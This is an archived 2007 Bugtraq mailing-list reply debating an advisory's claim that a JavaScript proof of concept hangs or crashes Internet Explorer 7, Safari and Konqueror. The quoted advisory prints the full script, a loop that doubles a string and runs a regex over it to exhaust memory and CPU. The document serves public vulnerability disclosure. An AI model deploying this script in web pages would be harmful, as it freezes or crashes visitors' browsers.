lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 18 Apr 2007 23:12:01 +0700
From: Tom Gregory <sick.minded@...il.com>
To: "Thor (Hammer of God)" <thor@...merofgod.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Internet Explorer Crash

Actually Yes, the PoC crashing my IE, make it hang and my CPU usage goes
to 100%, and i'm using Internet Explorer 7.0.5730.11 like he said.

Tom



Thor (Hammer of God) wrote:
> Actually, I just get a message that says "A script on this page is
> causing Internet Explorer to run slowly."  But my CPU usage for
> iexplore.exe is only at 20, and my system didn't slow down in the
> least.  I went ahead and told IE to continue to run the script, and pops
> up again in a bit asking me the same thing.  Finally bored, I say "no"
> and it immediately came up with "Goodbye" on the page.
> 
> If this actually makes Safari and Konqueror crash, why the "stop using
> Microsoft products" recommendation?  At least IE is smart enough to tell
> me that your little "stupidInternetExploder" script is being pesky.
> 
> t
> 
> ----- Original Message ----- From: "J. Oquendo" <sil@...iltrated.net>
> To: <bugtraq@...urityfocus.com>
> Sent: Tuesday, April 17, 2007 10:09 AM
> Subject: Internet Explorer Crash
> 
> 
>>
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
> 
> 
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
> 
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
> 
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
> 
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
> 
> V. Code
> 
> $ more /stupidInternetExploder.html
> 
> <script>
> 
> var reg = /(.)*/;
> 
> var z = 'Z';
>                while (z.length <=
> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 
> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)
> z+=z;
>        var boum = reg.exec(z);
> 
> </script>
> 
> Goodbye
> 
> 
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> sil . infiltrated @ net http://www.infiltrated.net
> The happiness of society is the end of government.
> John Adams
> 
> 
>>
>>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ